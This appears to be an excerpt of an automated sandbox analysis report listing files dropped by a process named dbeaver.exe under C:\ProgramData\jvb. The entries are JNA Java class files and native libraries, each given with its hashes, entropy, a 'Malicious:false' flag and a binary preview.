      Encrypted:false
      SSDEEP:
      MD5:E296DE6DB6D02AB39F4F2D46026BBB2C
      SHA1:E60EAF012D162B2ED1238C985B04F8FA4AFC38D3
      SHA-256:ED1A01C97B2DFA4D916CF87D07604C8B6710F13C60D88AA0FADFC35264E7AAD9
      SHA-512:DA052CC7940DB89ACAFB5359CB0FC9D22701D1ECAD8BCFB7898CE31C5915CD780FB9EB3681A3C5BDEBB45A2CBC16B5721D415B04CD298E941BFB9A7E8077D354
      Malicious:false
      Reputation:unknown
      Preview:.......2..........................struct...Lcom/sun/jna/Structure;...field...Ljava/lang/reflect/Field;...<init>..3(Lcom/sun/jna/Structure;Ljava/lang/reflect/Field;)V...Code...LineNumberTable...LocalVariableTable...this..#Lcom/sun/jna/StructureWriteContext;...getStructure...()Lcom/sun/jna/Structure;...getField...()Ljava/lang/reflect/Field;...SourceFile...StructureWriteContext.java.................!com/sun/jna/StructureWriteContext...com/sun/jna/ToNativeContext...()V.!.......................................Y........*...*+...*,...................$...%...&...'..... ............................................./........*...................).............................../........*...................,............................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):201
      Entropy (8bit):4.99277853256505
      Encrypted:false
      SSDEEP:
      MD5:363C48F4C49F7FD7CA7F408D02A4F863
      SHA1:170FA6E84C9C371686A9B71E58F9B869C4A51E44
      SHA-256:D43082A6F35BAD50EDABDF866DABB70A1E8DB6937E6EA1711C4FA96D7A029119
      SHA-512:17CB7D7284E976CF9FFBA71D87CF4F4BB69C7F8B72CE02F3FC7B7BEB6CF2A7BCF404B94FBA5C5EECD16C7460F6FAE244972D1C43761B0CDE1D795C2DE2962D1F
      Malicious:false
      Reputation:unknown
      Preview:.......2...........getSymbolAddress..2(JLjava/lang/String;Lcom/sun/jna/SymbolProvider;)J...SourceFile...SymbolProvider.java...com/sun/jna/SymbolProvider...java/lang/Object..............................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):298
      Entropy (8bit):4.838445730780342
      Encrypted:false
      SSDEEP:
      MD5:F2C55C68FFB52E9E210630DF01B459C6
      SHA1:3DBB5461A4A2896E1BA786441433EF9DB16B810B
      SHA-256:05356962422D75A8573F5C8521FFD9CC66BE5C60F2B21AACA5A86D815E2DB1C4
      SHA-512:2078B2BDDB5FDFA72B8C0B2F645F299A741F151D3C40E533556FCD64A83208247F601524A4112FE6467ECFDF4BEB7857C860D51AA8EAFDBEEB62EBBF8CF96E0C
      Malicious:false
      Reputation:unknown
      Preview:.......2................<init>...()V...Code...LineNumberTable...LocalVariableTable...this...Lcom/sun/jna/ToNativeContext;...SourceFile...ToNativeContext.java........com/sun/jna/ToNativeContext...java/lang/Object.!.......................3........*....................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):304
      Entropy (8bit):4.98076633286333
      Encrypted:false
      SSDEEP:
      MD5:4A385552DE995F48FA3A17B3965A5FF7
      SHA1:25EC1B93F2037D9171377A62110ECD08430BC553
      SHA-256:A5A0669C5DE2FBA230A80C2E7F02886B9A4971CE26A7095BB317C2905B7A8CF4
      SHA-512:7998DC1B48B0C8681289F23D710D266F290E0C1964400A0646B4DC0508B99ABB4B07E16151FDA5A8F326B6E3A8E446B1E10A01CCB58C8737F3C6485AAF8C2BA3
      Malicious:false
      Reputation:unknown
      Preview:.......2...........toNative..C(Ljava/lang/Object;Lcom/sun/jna/ToNativeContext;)Ljava/lang/Object;...nativeType...()Ljava/lang/Class;...Signature...()Ljava/lang/Class<*>;...SourceFile...ToNativeConverter.java...com/sun/jna/ToNativeConverter...java/lang/Object..............................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):195
      Entropy (8bit):4.821794100012652
      Encrypted:false
      SSDEEP:
      MD5:09289D3385ECC7819830A0A6AA592EC6
      SHA1:1D082871F08B3C90346C128724CBF899DA1FA3AB
      SHA-256:00AEFB906CEBC0B73C5C740937BBA93410D1C0FB991AE71ADEA2944369C262F0
      SHA-512:1F7F4AB61C45216E209898D27D17A99A9B5D4D4053A2C33B1CBD7C485A07321422BA050DF74AAEA45C7709D67FD76AFF2D75B067A967900471CC3B95E8E905CA
      Malicious:false
      Reputation:unknown
      Preview:.......2.................SourceFile...TypeConverter.java...com/sun/jna/TypeConverter...java/lang/Object...com/sun/jna/FromNativeConverter...com/sun/jna/ToNativeConverter..........................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):427
      Entropy (8bit):5.03570216666989
      Encrypted:false
      SSDEEP:
      MD5:C15D2EE67A9B1057906637D5F0E3F2C6
      SHA1:F64FAC5EBC9CB63B36965FC6497925A3D1467D02
      SHA-256:BEFF707BA4D95C9D090139D4B4C392ECCB8D2C6C4EE2A01743ACD5D7BB8AF4E3
      SHA-512:A9CED489FC62A7A29397D8AC7CD605C74E3CD96E4B5B64E6F7BECAB2D527E3FA8AEBBF6AB188D05E16C62C1FDD3F782FFC58820B0C6FBFE05D7B3D004C7526A1
      Malicious:false
      Reputation:unknown
      Preview:.......2...........getFromNativeConverter..4(Ljava/lang/Class;)Lcom/sun/jna/FromNativeConverter;...Signature..7(Ljava/lang/Class<*>;)Lcom/sun/jna/FromNativeConverter;...getToNativeConverter..2(Ljava/lang/Class;)Lcom/sun/jna/ToNativeConverter;..5(Ljava/lang/Class<*>;)Lcom/sun/jna/ToNativeConverter;...SourceFile...TypeMapper.java...com/sun/jna/TypeMapper...java/lang/Object......................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):5333
      Entropy (8bit):5.439314983158842
      Encrypted:false
      SSDEEP:
      MD5:9CCA128F2498AE918051AF7E89D37728
      SHA1:BE804C29A6FDFF53CEDFC7E856C875D13C01A074
      SHA-256:E91EB93990A653A9B7E7010721D742030F208E334B1AE6D7AD79013F206022FC
      SHA-512:F7ED42259E96607BE7C0807D7461FF03BFC3F2B15757BE08ADACC474E78A974E6DBF990B052D4FDB0B8EBD90C7AFF468655139110D1AEFDBF4239AB0B5AB552D
      Malicious:false
      Reputation:unknown
      Preview:.......2......{....|....}....~.......3.............................................3....3......................3............{....................................3...................3.........3.........3....3.....................................activeField...StructField...InnerClasses..#Lcom/sun/jna/Structure$StructField;...<init>...()V...Code...LineNumberTable...LocalVariableTable...this...Lcom/sun/jna/Union;...(Lcom/sun/jna/Pointer;)V...p...Lcom/sun/jna/Pointer;...(Lcom/sun/jna/Pointer;I)V...alignType...I...(Lcom/sun/jna/TypeMapper;)V...mapper...Lcom/sun/jna/TypeMapper;..1(Lcom/sun/jna/Pointer;ILcom/sun/jna/TypeMapper;)V...getFieldOrder...()Ljava/util/List;...f...Ljava/lang/reflect/Field;...flist...Ljava/util/List;...list...LocalVariableTypeTable..+Ljava/util/List<Ljava/lang/reflect/Field;>;..$Ljava/util/List<Ljava/lang/String;>;...StackMapTable.........Signature..&()Ljava/util/List<Ljava/lang/String;>;...setType...(Ljava/lang/Class;)V...type...Ljava/lang/Class;...Ljava/lang/Class<*>;
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):214
      Entropy (8bit):4.863445433295367
      Encrypted:false
      SSDEEP:
      MD5:9BCF30E8462A16EC2DE7F50BECCB5393
      SHA1:DD4202EC866CDD87CA7130A200ACA2E5BF00DB50
      SHA-256:EDFC7A13EA9E83101D1D245E3FFAD45C992450DD445111E512A3670F59D022A5
      SHA-512:E24D044E9DC5A833A56EBE0780F159D58F4ECE3A9083997D206DE4C35A07629ACAB439AF93C303C8D93767081BBDE4FF6445D90D7D1408092B3F31A87EDC4E74
      Malicious:false
      Reputation:unknown
      Preview:.......2...........SourceFile...VarArgsChecker.java...EnclosingMethod......com/sun/jna/VarArgsChecker$1...InnerClasses...java/lang/Object...com/sun/jna/VarArgsChecker. ..............................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):840
      Entropy (8bit):4.906902127539878
      Encrypted:false
      SSDEEP:
      MD5:ABD93277B958A64E14E16E1F1C085D54
      SHA1:7AB25D7D7ABF689EAF6ACFB01BF804A91595AC6D
      SHA-256:586C9D829D912EF0BC5FA1258A3924C38FECDC7A22AC184B72B530E4A5E3F960
      SHA-512:7E2185476BD10B4383EC44305317ADBE6935D206A7BEB06BB47C2636A8AC9726AF3F0409BD60891375E39418112116B509545D851366673DED50B66355CC5519
      Malicious:false
      Reputation:unknown
      Preview:.......2.....................<init>...()V...Code...LineNumberTable...LocalVariableTable...this...NoVarArgsChecker...InnerClasses..-Lcom/sun/jna/VarArgsChecker$NoVarArgsChecker;...isVarArgs...(Ljava/lang/reflect/Method;)Z...m...Ljava/lang/reflect/Method;...fixedArgs...(Ljava/lang/reflect/Method;)I.....!(Lcom/sun/jna/VarArgsChecker$1;)V...x0...Lcom/sun/jna/VarArgsChecker$1;...SourceFile...VarArgsChecker.java............+com/sun/jna/VarArgsChecker$NoVarArgsChecker...com/sun/jna/VarArgsChecker...com/sun/jna/VarArgsChecker$1.0.......................0........*....................<...............................6.........................?.........................................6.........................C.........................................9........*...................<..............................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):992
      Entropy (8bit):5.088369619188998
      Encrypted:false
      SSDEEP:
      MD5:ED7832F926DAEADFA9FE32D3BDC99AA2
      SHA1:544578FF295B5C08ADF20F4461D9F5AC2143E87C
      SHA-256:C6386FB4C98CB366CF1EAB89690C3D1AC492217583A7F0DA5DCBD8E493BC2D1D
      SHA-512:81091B8A48E5E29E692C5014F5121BC14774596254EC93F251A718D59189FBE6361906065B370960DC7E681C460DD0051B1B5913E10020C6F11A8C2C351BA11C
      Malicious:false
      Reputation:unknown
      Preview:.......2.).............. ....!.."..#...<init>...()V...Code...LineNumberTable...LocalVariableTable...this...RealVarArgsChecker...InnerClasses../Lcom/sun/jna/VarArgsChecker$RealVarArgsChecker;...isVarArgs...(Ljava/lang/reflect/Method;)Z...m...Ljava/lang/reflect/Method;...fixedArgs...(Ljava/lang/reflect/Method;)I...StackMapTable..$..!(Lcom/sun/jna/VarArgsChecker$1;)V...x0...Lcom/sun/jna/VarArgsChecker$1;...SourceFile...VarArgsChecker.java............%....&..'.(..-com/sun/jna/VarArgsChecker$RealVarArgsChecker...com/sun/jna/VarArgsChecker...com/sun/jna/VarArgsChecker$1...java/lang/reflect/Method...()Z...getParameterTypes...()[Ljava/lang/Class;.0.......................0........*....................,...............................9........+.................../.........................................R........+......+.....d....................4.....................................@..............9........*...................,..............................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1402
      Entropy (8bit):5.3769987186086565
      Encrypted:false
      SSDEEP:
      MD5:C6A9F8CD290D058DD33F679C4D7F1FE9
      SHA1:C38ABDB802E4AB4DA8FA83D2EAE59F614D92824F
      SHA-256:669133CD72D22678FA882E14F80BE0837213176C117EEF25D9B7C8733F5B6C6D
      SHA-512:28E88B09A7BC1BED61DADDF05AC5E428FFD62A2BFEA38F6B60F94226C1ABBD6CF8ADE3BEDE4CD037E7008CF942D317899A813C79A972B3E603021A88EA83B176
      Malicious:false
      Reputation:unknown
      Preview:.......2.<............/..%..0....1..2....3..4....3..5..6..7..8..9...InnerClasses...NoVarArgsChecker...RealVarArgsChecker...<init>...()V...Code...LineNumberTable...LocalVariableTable...this...Lcom/sun/jna/VarArgsChecker;...create...()Lcom/sun/jna/VarArgsChecker;...isVarArgsMethod...Ljava/lang/reflect/Method;...e..!Ljava/lang/NoSuchMethodException;...Ljava/lang/SecurityException;...StackMapTable../..5..6...isVarArgs...(Ljava/lang/reflect/Method;)Z...fixedArgs...(Ljava/lang/reflect/Method;)I..!(Lcom/sun/jna/VarArgsChecker$1;)V...x0...Lcom/sun/jna/VarArgsChecker$1;...SourceFile...VarArgsChecker.java........java/lang/reflect/Method...java/lang/Class..:.;..-com/sun/jna/VarArgsChecker$RealVarArgsChecker....)..+com/sun/jna/VarArgsChecker$NoVarArgsChecker...java/lang/NoSuchMethodException...java/lang/SecurityException...com/sun/jna/VarArgsChecker...java/lang/Object...com/sun/jna/VarArgsChecker$1...getMethod..@(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;. ....................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):226
      Entropy (8bit):5.052514315954409
      Encrypted:false
      SSDEEP:
      MD5:B10816F4FCC3F7F2C8D928F9D60175EF
      SHA1:2AD5E132930900076AF73831DCE3DD29AB478CBB
      SHA-256:C2FC1FDB0F31B1F04F9E3CE73A8242BCF2A146975B548E47759BDDB8D8805972
      SHA-512:1FE93978EF28BF77581CCF0E6312393A71C278826BE12B85D84A60BAB05B53ECCE308DDE19F5B5DF794F681ADE28872FDDD00E1984C9A9BFF1209AE406E6DBDE
      Malicious:false
      Reputation:unknown
      Preview:.......2...........VERSION...Ljava/lang/String;...ConstantValue......VERSION_NATIVE......SourceFile...Version.java...com/sun/jna/Version...java/lang/Object...5.13.0...6.1.6......................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1473
      Entropy (8bit):4.943032114382875
      Encrypted:false
      SSDEEP:
      MD5:14AAB11F883FE54B783F98CB584B1207
      SHA1:DACF442567B0DBFDEA7E276D682AA73AE21F5895
      SHA-256:693F8A7F66C7C35041647E2E845C52080726D02AE2B316278F03BA754ACC8C55
      SHA-512:1135AB3F5EF38E5ADA95E12C37C841895728D999DD07C2882AA8F7D9E5DFEC2DF3A8179A6220CC38BC2D6526B09BEBE6CCC4BE3267E2CCB8DE22DF3E8074A5B1
      Malicious:false
      Reputation:unknown
      Preview:.......2.H....4..5..6....7....8..9....:....:..;.<..;.=..;.>..;.?..;.@..;.A..B..C..D...string...Ljava/lang/String;...<init>...(Ljava/lang/String;)V...Code...LineNumberTable...LocalVariableTable...this...Lcom/sun/jna/WString;...s...StackMapTable..9..E...toString...()Ljava/lang/String;...equals...(Ljava/lang/Object;)Z...o...Ljava/lang/Object;...hashCode...()I...compareTo...(Ljava/lang/Object;)I...length...charAt...(I)C...index...I...subSequence...(II)Ljava/lang/CharSequence;...start...end...SourceFile...WString.java....F...java/lang/NullPointerException..#String initializer must be non-null.............com/sun/jna/WString.... ..E..!."..%.&..'.G..).&..*.+..../...java/lang/Object...java/lang/CharSequence...java/lang/Comparable...java/lang/String...()V...(Ljava/lang/String;)I.1...................................q........*...+......Y......*+....................... ...!...#...$...................................................... ......./........*...................'.....................!."..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1538
      Entropy (8bit):5.3120661639021005
      Encrypted:false
      SSDEEP:
      MD5:D72376A21527960DAD78BFDA57A124A9
      SHA1:C4F9B840A5504A86428B477445527EBBA981F934
      SHA-256:681B6A4FC56BE93C52AC00D9435726FFA0DEB95C1902B5476234DEEED86446EC
      SHA-512:C02AC006685958DA34F829904819C17A9B47705EFBAD885AF8FB25598E5F8873149D592DC6B01712719793B35286D57A74454E47999D4A9E37A9B5AB75F42DA8
      Malicious:false
      Reputation:unknown
      Preview:.......2.B......./.........0..1.........2....3..4....5....6....7....8..9..:...referenceQueue...Ljava/lang/ref/ReferenceQueue;...Signature..2Ljava/lang/ref/ReferenceQueue<Ljava/lang/Object;>;...backingMap...Ljava/util/IdentityHashMap;..^Ljava/util/IdentityHashMap<Ljava/lang/ref/Reference<Ljava/lang/Object;>;Lcom/sun/jna/Memory;>;...<init>...()V...Code...LineNumberTable...LocalVariableTable...this...Lcom/sun/jna/WeakMemoryHolder;...put..)(Ljava/lang/Object;Lcom/sun/jna/Memory;)V...o...Ljava/lang/Object;...m...Lcom/sun/jna/Memory;...reference...Ljava/lang/ref/Reference;...LocalVariableTypeTable..-Ljava/lang/ref/Reference<Ljava/lang/Object;>;...clean...ref...StackMapTable..;...SourceFile...WeakMemoryHolder.java........java/lang/ref/ReferenceQueue........java/util/IdentityHashMap.......(.....java/lang/ref/WeakReference....<....=..>.?..@.A...com/sun/jna/WeakMemoryHolder...java/lang/Object...java/lang/ref/Reference..3(Ljava/lang/Object;Ljava/lang/ref/ReferenceQueue;)V..8(Ljava/lang/Object;Lja
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:64-bit XCOFF executable or object module
      Category:dropped
      Size (bytes):657031
      Entropy (8bit):5.230273735557299
      Encrypted:false
      SSDEEP:
      MD5:87185FBA133C6D1BBB1E1A37F2BF92CB
      SHA1:451E336645E446AD50E3C33ADB114E4C5796B7D4
      SHA-256:7B4EDAEDCACBEB2439EF43BCEE365AD1E6A989156085D6BA764C8A939E7A5FB3
      SHA-512:55995641D15E835B674BC5E4CF77A1CA5B52605BE55ED46F8B851DBA59BD5E696069AA438E3701DCDDFF7885F0836F4F65015B7F9EBD5B89C47D789D0DF48E7E
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:....c..S......)*.x0...4/...............@.... ....... ...................RE............/o.........................................................text..........@.......@....../o.......@...............r...C...:... .....data....... ....... .................1.......k............3.......@.....bss........ ..P.... ..P.................................................loader.......................A.......HP.................................debug............................................................ .............................................................................}..&.!...A..|.......;".......a..............||.x;@...........!.Q.#...A.(`...`....y../...A..P....;...{...;..........@A..(`...`...A..`.?......A..T;......@@....{../...@...8!...............!..|....A...a..}.. ..............N.. ._......} ..,)..@....@..@...L..,@....*..8....j..;..x}).......J..N..!.A.(.>......A..`K......... C...........8..__cxa_finalize....|..x.c...!../...A...8...8....#../...A..D9...y...}CR..J../...@..H})..8...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:executable (RISC System/6000 V3.1) or obj module not stripped
      Category:dropped
      Size (bytes):613528
      Entropy (8bit):5.419437089651479
      Encrypted:false
      SSDEEP:
      MD5:9D7FA64940A265EC8468E8C6BB6C6031
      SHA1:E41FA20BE19534B5829966A3663795360FB14218
      SHA-256:610EC1A4AF9761F85991D8F44BA1458F17202A68A86CC5400943FB9AAD69AAE2
      SHA-512:41B444C7DC094FF6D6FB726B3D15CE79E87D833C3076EDD68F567010AD54D475EEC4BAECFC53BE80F88EA7B1A0391BA13B426A46E77DD52895AF23342D1FAF1C
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:....c.....}...4o.H0.......#........t.......P ../ ...................RE.......................text......P...P..#....P...0..2..T..... .data... ../ ../......%/...x.....4.....@.bss.... ... ......t.....................loader...........7...1..................debug............t;..h............... .............................................}..&|....A..;B.l.a................!...........|}.x....;`...!.......A..`......./...A..P....;<..W. 6;..........@A..(`...`...A..p.?......A..d;......@@...../...@...8!.`...............}.. .!..A..|....a...............N.. `...`...`...._......} .(,...@....`.-@...L..,@....*..8....j..;...})...........J..N..!.A...>......@....>......A..@K......... C...........X..__cxa_finalize....|..x.c...!../...A.. 8...8....#../...A..D9...U. 6}CR..J../...@..H})..8...H...UI 6}'H./...@..4}HSx9H..B...#......|e.x/...A...}#KxK...}(Kx`...+.. A..L9H..U. 6.C..9)..}#J.9B..9...............1...|...........8!.@}#Kx....N.. /...|.+x@..<|......H8...8`..H...A..9 ..,...A..H.?.........H
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Mach-O 64-bit arm64 dynamically linked shared library, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL|NO_REEXPORTED_DYLIBS>
      Category:dropped
      Size (bytes):178160
      Entropy (8bit):4.56426934058072
      Encrypted:false
      SSDEEP:
      MD5:61E41159996A400AB40AAFBF346391BD
      SHA1:BC1756279C8890157BAAB849E92A8D02048A48C9
      SHA-256:02DA67FF04378C0EB74FB303327AE53C7411205306E8BE4CBFCD1DE4DFFC1A06
      SHA-512:A6430C81B3207B2D97FCA505CCA00FC5895EAE1D78A1B5911E65F7572DCECA8795510549D5B1AAAA9171F80177E24F9EDAFD5F9582A7DB33356528CCE152A63D
      Malicious:false
      Reputation:unknown
      Preview:....................................(...__TEXT..........................................................__text..........__TEXT...........@.......@.......@..............................__stubs.........__TEXT..........................................................__stub_helper...__TEXT..........................................................__const.........__TEXT..................0.......................................__cstring.......__TEXT..........H........!......H...............................__eh_frame......__TEXT..............................................................8...__DATA_CONST.............@...............@......................__got...........__DATA_CONST............(........................... ...........__const.........__DATA_CONST....(.......@.......(...............................__objc_imageinfo__DATA_CONST....h...............h.......................................__DATA...................@...............@......................__la_symbol_ptr.__DATA..........
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL>
      Category:dropped
      Size (bytes):127472
      Entropy (8bit):5.2824989773064726
      Encrypted:false
      SSDEEP:
      MD5:35C4C2E1D1238814C8513335FDA4F2C0
      SHA1:9291303B63907AA48D7FCD819526053D0CC18E1D
      SHA-256:4B818489351662A21DFA1BF76AA58C9F62BDD1ABA09A47388DFAB7648AECE31C
      SHA-512:5BDF90D67C853C28521083516C55FF42D02C0FE3596E8554382AEAB0428AD420151FE01201C17AD7F70DB3F618A8D3988EEA7AE2C72007A72D0BDB7643D437DB
      Malicious:false
      Reputation:unknown
      Preview:....................................(...__TEXT...................@...............@......................__text..........__TEXT..................V.......................................__stubs.........__TEXT..........V...............V...............................__stub_helper...__TEXT..........0...............0...............................__const.........__TEXT..........................................................__cstring.......__TEXT...................!......................................__eh_frame......__TEXT...........#...............#......................................__DATA...........@.......@.......@.......@......................__dyld..........__DATA...........@...............@..............................__got...........__DATA...........@...............@..................$...........__la_symbol_ptr.__DATA...........@...... ........@..................%...........__const.........__DATA..........@A..............@A..............................__objc_imageinfo__DATA..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ELF 64-bit LSB shared object, x86-64, version 1 (FreeBSD), dynamically linked, not stripped
      Category:dropped
      Size (bytes):121307
      Entropy (8bit):5.868197439140535
      Encrypted:false
      SSDEEP:
      MD5:6610C1A84AB4C6FA6D9720FEE158AE4F
      SHA1:146641EF9152358CB10981B067AA7D9E4B157978
      SHA-256:BD4290041F792C54B1F6F4E19B3FA890450B8CA0173513CBED63171BD34DC865
      SHA-512:3A4E996CAB07FB71D2B999953AE3FCAC1506C313600514AD54A314FD6D2099613A98024BF6ABD445854A8246DFAC2E790815BBE0FC2711D0F631759D1C20B207
      Malicious:false
      Reputation:unknown
      Preview:.ELF..............>.....PA......@.......X...........@.8...@..................................................... .......................!.......!....................... .............0.......0.!.....0.!.............................P.td.....m.......m.......m..............................Q.td....................................................................N...R.......)... ...............................I...............Y.......T...h...f...........................S...........H...c...................0...g...........9.......d.../...........A.......m...............Z...............t.......l.......................U...............n..................."...5...b...........................~...................................V...............`.......x...[...........+...............................K...................8...............=...u...,...4...-...s.......|...........................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ELF 32-bit LSB shared object, Intel 80386, version 1 (FreeBSD), dynamically linked, not stripped
      Category:dropped
      Size (bytes):109718
      Entropy (8bit):6.290054086034571
      Encrypted:false
      SSDEEP:
      MD5:C190C9425E9C5CC0BA77A93347412993
      SHA1:70A845B0EFDD364DDFEC47C8A2705DA19F07866D
      SHA-256:431B48290CC2DF7C4348E7549506DADAB2BA68268F5C4B52273826F4F74A6D36
      SHA-512:55BE70151B69A5D8D5A595421C7EA02114A929E1C33218C52994D095E6604056A3B8984787A2125B4DB645DEE1752331E44CC9A3F6D37724403A5CEA60E4FFD3
      Malicious:false
      Reputation:unknown
      Preview:.ELF.....................0..4...........4. ...(.........................................................T........................................P.td.Y...Y...Y..................Q.td............................................O...S.......)... ...............................J...............Z.......U...i...g...........................T...........I...d...................0...h...........9.......e.../...........A.......n...............[...............u.......m.......................V...............o..................."...5...c...............................................................W...............a.......y...\...........+...............................L...................8...............=...v...,...4...-...t.......}.......................................................................................................................................................................................................................................*...............!.......................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1567
      Entropy (8bit):5.30343515667141
      Encrypted:false
      SSDEEP:
      MD5:AAFDF6C4781D5E77C68A0DA46615526E
      SHA1:8FE0B10A45E633D61DAB1DF2671891BCA2C049F6
      SHA-256:1D13BCABFEA2FE212CC8B36FB38849CB2EFB33DAC8633C836F63E8660E911A37
      SHA-512:5F604AE2542F7C903B602CFAA8098E270F09202E0638AD9B52A4642639AF18743B0C0DE86BCD62C868CD6BD44E8CC3D8737CD76B4F8EEEEF6D683974AFAFEBF9
      Malicious:false
      Reputation:unknown
      Preview:.......2.N....*....)....+..,.-.......0..1..2..3..4.5..6.7..8.9..6.:..;..<...this$0...Lcom/sun/jna/internal/Cleaner;...<init>..!(Lcom/sun/jna/internal/Cleaner;)V...Code...LineNumberTable...LocalVariableTable...this...InnerClasses.. Lcom/sun/jna/internal/Cleaner$1;...run...()V...ref...Ljava/lang/ref/Reference;...ex.. Ljava/lang/InterruptedException;...Ljava/lang/Exception;...LocalVariableTypeTable...Ljava/lang/ref/Reference<+Ljava/lang/Object;>;...StackMapTable..1..2...SourceFile...Cleaner.java...EnclosingMethod............=.>..?..@.A..'com/sun/jna/internal/Cleaner$CleanerRef...CleanerRef..B.....java/lang/InterruptedException...java/lang/Exception...com/sun/jna/internal/Cleaner..C..D.E..F..G.H..I..J.K..L.M...com/sun/jna/internal/Cleaner$1...java/lang/Thread...access$000..>(Lcom/sun/jna/internal/Cleaner;)Ljava/lang/ref/ReferenceQueue;...java/lang/ref/ReferenceQueue...remove...()Ljava/lang/ref/Reference;...clean...java/lang/Class...getName...()Ljava/lang/String;...java/util/logging/Logger.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):225
      Entropy (8bit):4.6371980238168975
      Encrypted:false
      SSDEEP:
      MD5:E6FFF29B0A0803EB54E1F7D9540AFF3E
      SHA1:2CFB7EBB555B68DBFF1E1A9C44B1B8ADD177A418
      SHA-256:23B483FD6CBCE8F8607E82368E78E4B9584C0DE40A417EF7B6DD465689BCCAC7
      SHA-512:A4460980AB657A9119E6351F5E6E59F898CA5C62D24881A32D02B5595F3921D8165E68220FB949D7F9854BC7DFD457F8C0FD30874E67976CD45BEECDE2A306EB
      Malicious:false
      Reputation:unknown
      Preview:.......2...........clean...()V...SourceFile...Cleaner.java.....&com/sun/jna/internal/Cleaner$Cleanable...Cleanable...InnerClasses...java/lang/Object...com/sun/jna/internal/Cleaner..............................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1948
      Entropy (8bit):5.049197350945947
      Encrypted:false
      SSDEEP:
      MD5:24D4A351963384B280314358AFACEE69
      SHA1:D50CF2FC05C18AD2283CD649607826D2D3E95C30
      SHA-256:69F5710EE864B9651F79BDEDCDB42603C44CF7BDD3F101D4F375BF74FDEB64B9
      SHA-512:6F4B8D2551A03DF6A19C940BB6191383C3558CCD5C46FFDC185628B5AE8F61B604D99BB445587D1A131FB57303AFA3B1CE084A9D2FFA4C4280ACDC2B2B81802C
      Malicious:false
      Reputation:unknown
      Preview:.......2.A..../....0....1..2.3..4.5....6....7..8..9..:...cleaner...Lcom/sun/jna/internal/Cleaner;...cleanupTask...Ljava/lang/Runnable;...previous...CleanerRef...InnerClasses..)Lcom/sun/jna/internal/Cleaner$CleanerRef;...next...<init>..e(Lcom/sun/jna/internal/Cleaner;Ljava/lang/Object;Ljava/lang/ref/ReferenceQueue;Ljava/lang/Runnable;)V...Code...LineNumberTable...LocalVariableTable...this...referent...Ljava/lang/Object;...q...Ljava/lang/ref/ReferenceQueue;...LocalVariableTypeTable..3Ljava/lang/ref/ReferenceQueue<-Ljava/lang/Object;>;...Signature..z(Lcom/sun/jna/internal/Cleaner;Ljava/lang/Object;Ljava/lang/ref/ReferenceQueue<-Ljava/lang/Object;>;Ljava/lang/Runnable;)V...clean...()V...StackMapTable...getPrevious..+()Lcom/sun/jna/internal/Cleaner$CleanerRef;...setPrevious..,(Lcom/sun/jna/internal/Cleaner$CleanerRef;)V...getNext...setNext...Cleanable..\Ljava/lang/ref/PhantomReference<Ljava/lang/Object;>;Lcom/sun/jna/internal/Cleaner$Cleanable;...SourceFile...Cleaner.java....;............<.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):2652
      Entropy (8bit):5.237508452410583
      Encrypted:false
      SSDEEP:
      MD5:8DE6BCD21B014F0CC3B4EF999993B621
      SHA1:0CA254AA8F8D7EBD211FB6229331253203E61FAA
      SHA-256:9DB94AED5C9A19F6A2707E4A32799446C715CC05BF39ED43F2C541FE1022B3E2
      SHA-512:8C0FB978DE27CBF5D2CC4E5E5CEC5B955249BC0985713E954E37C6E93341290A57BE11380418B335E5F3494F79B8070AA7AEA83415D8ED75511AD4C3182A6210
      Malicious:false
      Reputation:unknown
